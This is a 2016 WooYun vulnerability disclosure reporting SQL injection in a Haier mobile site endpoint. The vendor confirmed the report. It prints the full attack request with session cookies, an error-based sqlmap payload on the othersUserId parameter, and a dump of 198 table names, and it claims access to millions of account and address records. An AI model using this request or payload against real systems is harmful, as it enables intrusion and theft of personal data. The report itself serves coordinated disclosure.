当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0209803

漏洞标题:海尔集团某处SQL注入漏洞(300万账号信息及200万地址信息)

相关厂商:海尔集团

漏洞作者: 路人甲

提交时间:2016-05-18 06:12

修复时间:2016-07-02 10:00

公开时间:2016-07-02 10:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-18: 细节已通知厂商并且等待厂商处理中
2016-05-18: 厂商已经确认,细节仅向厂商公开
2016-05-28: 细节向核心白帽子及相关领域专家公开
2016-06-07: 细节向普通白帽子公开
2016-06-17: 细节向实习白帽子公开
2016-07-02: 细节向公众公开

简要描述:

RT

详细说明:

POST /snaplb/profile/getOthersMessageListForMobel HTTP/1.1
Content-Length: 178
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://m.rrs.com/
Cookie: JSESSIONID=A70D0B53354901BACB9BEFBF6866FE49; rrs.com_ehaier_sessionid=67682DA5C5ACB656F9F9F724D2EF1C6E; rrs.com_ehaier_refererUrl="aHR0cDovL20ucnJzLmNvbS8="; rrs.com_ehaier_loginReturnUrl="aHR0cDovL20ucnJzLmNvbS9zaHVpL21vYmlsZS9waW5nYW4="; RRSSESS=e7g34t86s7gkebgnsivfjeam91; laravel_session=eyJpdiI6IlFJVTZYV2FYZFwvckdzT3lhcWI1b1l3PT0iLCJ2YWx1ZSI6IjhENXdiUXp3V2h1RTlYWk1jbTFsRnlZaVNBZnBBOXZhdlwvNXFraTlLVnlrV3Zzc2dYejdqYlRDTWlsbGlIcU80aWIycGI2QnplSXJrQzlBSzRWQWduQT09IiwibWFjIjoiNmYyMzdiZTUzNzg3ZmZkZmNlZmRlMDQ0Y2QxNDQ1NWRmOGQwYzhlY2I5ZGQ3ZGI5ODI1NzBlZGM2NzFiZTFiYiJ9; JSESSIONID=A70D0B53354901BACB9BEFBF6866FE49; ZXKJSESSIONID=43735fe5-ef4a-e052-6670-2147048924e1; UniqueName=43735fe5-ef4a-e052-6670-2147048924e1; Hm_lvt_e1b611e8ea607634925d9684f4e559e5=1462826878,1462827087,1462827310,1462827460; Hm_lpvt_e1b611e8ea607634925d9684f4e559e5=1462827460; _jzqa=1.4547732553112906000.1462826785.1462826785.1462826785.1; _jzqc=1; _jzqx=1.1462826785.1462826785.1.jzqsr=acunetix-referrer%2Ecom|jzqct=/javascript:domxssexecutionsink(0,"'\"><xsstag>()refdxss").-; _jzqckmp=1; _jzqb=1.11.10.1462826785.1; _qzja=1.668047106.1462826784881.1462826784881.1462826784881.1462830158492.1462830163560.%257B%257B_USER__name%257D%257D.1.0.20.1; _qzjb=1.1462826784881.20.0.0.0; _qzjc=1; _qzjto=20.1.0; HMACCOUNT=7A72A504167B356C; BAIDUID=D80BD201682D349E65CF00516B739F4C:FG=1; _gsref_113428431=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); _gscu_113428431=628268849w7j6y11; _gscs_113428431=62826884n31uwd11|pv:2; _gscbrs_113428431=1; NTKF_T2D_CLIENTID=guest578715F5-7A49-1619-68E7-C0CA6B804B6F; nTalk_CACHE_DATA={uid:he_1000_ISME9754_guest578715F5-7A49-16,tid:1462826909284801,opd:1}; Hm_lvt_504222469397f794ea8da61f8a4e10e2=1462829913,1462830158,1462830164,1462830412; Hm_lpvt_504222469397f794ea8da61f8a4e10e2=1462830412; nTalk_PAGE_MANAGE={|m|:[{|02026|:|270020|}],|t|:|04:50:02|}; SERVERID=4b4a76f761b5f05d5ba1368c620770ae|1462895108|1462895108; avr_137032388_0_0_4294901760_271286987_0=1854756157_60071446; Hm_lvt_972125b56f85b5c6ce2c83fd9305649e=1462829558,1462829669,1462829683,1462829913; Hm_lpvt_972125b56f85b5c6ce2c83fd9305649e=1462829913; __xsptplus163=163.1.1462828448.1462829913.12%233%7Cwww.acunetix-referrer.com%7C%7C%7C%7C%23%235CBGDdxBfWnucW7rlM1gtDfyRlm8qHDR%23; zid=a5a3a470f97a661e2b635fb6b309c9af; _pzfxuvpc=1462828582822%7C1416075934140965094%7C11%7C1462829913491%7C1%7C%7C1200018089110423045; _pzfxsvpc=1200018089110423045%7C1462828582822%7C11%7Chttp%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22)
Host: m.rrs.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
currentPage=1&othersUserId=i&userId=anonymous

1.png


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: othersUserId (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: currentPage=1&othersUserId=i' AND (SELECT 5804 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT (ELT(5804=5804,1))),0x71766a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'aBMj'='aBMj&userId=anonymous
---
back-end DBMS: MySQL 5.0
Database: snap_haier
[198 tables]
+---------------------------------------+
| activity_clean_code_data |
| area_data |
| area_data_bak |
| area_data_bak_13121101 |
| attachment |
| attitude_of_user_toward_object |
| attitude_statistics_toward_object |
| best_service_case |
| blog_attachment |
| blog_attachment_download_record |
| blog_comment |
| blog_excellent_record |
| blog_image |
| blog_lightblog |
| blog_lightblog_statistics |
| blog_like_record |
| blog_report_record |
| branch_record |
| city_data_weather |
| cms_base |
| cms_base_content_ref |
| cms_content |
| cms_content_top |
| code |
| comment_guide_info_pc |
| comment_guide_info_tbl |
| common_click_count |
| content_filter_word |
| credit_blog_record |
| credit_contribution_record |
| credit_record |
| credit_setting |
| daily_recommend |
| ds_business_oppo_et |
| ds_room_picture_et |
| ds_room_picture_et_copy |
| dynamic_image |
| faq_content |
| feed |
| feed_all_inbox |
| feed_followed_inbox |
| feed_followed_personal_inbox |
| feed_follower_personal_about_me_inbox |
| feed_follower_personal_inbox |
| feed_integrated_inbox |
| feed_topic_followed_inbox |
| feed_topic_inbox |
| feed_topic_personal_inbox |
| following_count |
| following_log |
| following_relation |
| gf_gift_receive_record_et |
| gift_packs |
| gift_packs_detail |
| gift_packs_user_ref |
| hot_lightblog_historical |
| hot_lightblog_monthly |
| hot_lightblog_weekly |
| interact_topic |
| interact_topic_category |
| interact_topic_comment |
| interact_topic_count |
| interact_topic_four_type |
| interact_topic_good |
| interact_topic_vote |
| invitation |
| invitation_authority |
| leave_message_tbl |
| lg_interface_invoke_et |
| lg_interface_invoke_ht |
| lg_job_et |
| login_record |
| ls_appraise_record_et |
| ls_appraise_record_ht |
| ls_workorder_et |
| ls_workorder_ht |
| ls_workorder_waiter_et |
| magnetic_stripe_table |
| monthly_top20_blogs |
| mytest |
| notification |
| notification_template |
| parameters_config |
| personal_setting_item |
| personal_setting_item_spec |
| personal_setting_value_spec |
| prize |
| product_failure |
| product_pic |
| product_register_record |
| recommendation |
| refered_user_recent_record |
| register_invitation_code |
| register_temporary_record |
| rel_wiki_hotkey |
| rel_wiki_one |
| sh_experience_comment_et |
| sh_experience_praise_et |
| sh_experience_recommend_et |
| sh_experience_recommend_ht |
| sh_experience_statistics_et |
| sh_free_comment_et |
| sh_haier_back_record |
| sh_user_win |
| sh_user_win_comment_et |
| sh_user_win_praise_et |
| share_stuff |
| share_stuff_comment |
| share_stuff_good |
| share_stuff_tags |
| social_assess_record |
| st_appraise_record |
| st_social_assess_record |
| st_workorder |
| star_shop_table |
| strainer_record |
| sys_data |
| sys_mode_info |
| tag |
| tag_map |
| template |
| test |
| tmp_ds_room_picture_et |
| tmp_ls_workorder_et_bak |
| tmp_sh_user_win |
| tmp_sys_mode_info |
| tmp_user_hits_hot |
| tmp_user_integral_details_all |
| tmp_userprofile |
| tmp_userprofile_bak |
| topic |
| topic_category |
| topic_reply_detail |
| topic_statistics |
| topic_statistics_of_user |
| topic_subscription_record |
| topic_visit_record |
| unit_base_data |
| unit_base_data_bak |
| unit_house_data |
| unit_house_data_bak |
| unit_house_data_bak_13121101 |
| unit_house_data_copy |
| unit_house_temp |
| unit_shop_data |
| up_city_info |
| up_codelist |
| up_province_et |
| up_province_et_copy |
| user_account |
| user_account_copy |
| user_address |
| user_address_for_act |
| user_area_record |
| user_authority |
| user_business_authority |
| user_daily_recommend |
| user_friends_tbl |
| user_goodskill_rt |
| user_goodskill_rt_bak |
| user_hits_hot |
| user_integral_details_all |
| user_integral_details_one |
| user_integral_grade |
| user_integral_prize |
| user_integral_source |
| user_refer_record |
| user_regist_tbl |
| user_related_policy |
| userprofile |
| userprofile_achievement |
| userprofile_bak |
| userprofile_complete_degree |
| userprofile_education_experience |
| userprofile_obtain_phone_record |
| userprofile_project_experience |
| userprofile_project_experience_detail |
| userprofile_skill_support_record |
| userprofile_skill_support_statistics |
| userprofile_statistics |
| userprofile_training_experience |
| userprofile_work_experience |
| value_added_products |
| visit |
| vote |
| vote_detail |
| vote_option |
| vote_result |
| water_purifier |
| web_click_count |
| web_click_uv_count |
| wiki_base |
| wiki_base_content_ref |
| wiki_content |
| wiki_content_top |
| winning_info |
| world_cup_activity_tbl |
| world_cup_support_num |
+---------------------------------------+


300万账户信息:

2.png


200万地址信息:

3.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-05-18 09:51

厂商回复:

感谢白帽子的测试与提醒,已安排人员进行修复

最新状态:

暂无


漏洞评价:

评价

  1. 2016-05-18 06:19 | diguoji ( 普通白帽子 | Rank:505 漏洞数:122 | 中国吉林长春,高考230分,现在家里务农。)

    审核的起来好早啊

  2. 2016-05-18 08:30 | Dotaer ( 路人 | Rank:28 漏洞数:8 | 多学习,多挖洞!)

    @diguoji 一看就暴露你洞主的身份了

  3. 2016-05-18 08:32 | diguoji ( 普通白帽子 | Rank:505 漏洞数:122 | 中国吉林长春,高考230分,现在家里务农。)

    @Dotaer NO NONO 真不是我

  4. 2016-05-18 09:02 | Dotaer ( 路人 | Rank:28 漏洞数:8 | 多学习,多挖洞!)

    @diguoji 解释就是掩饰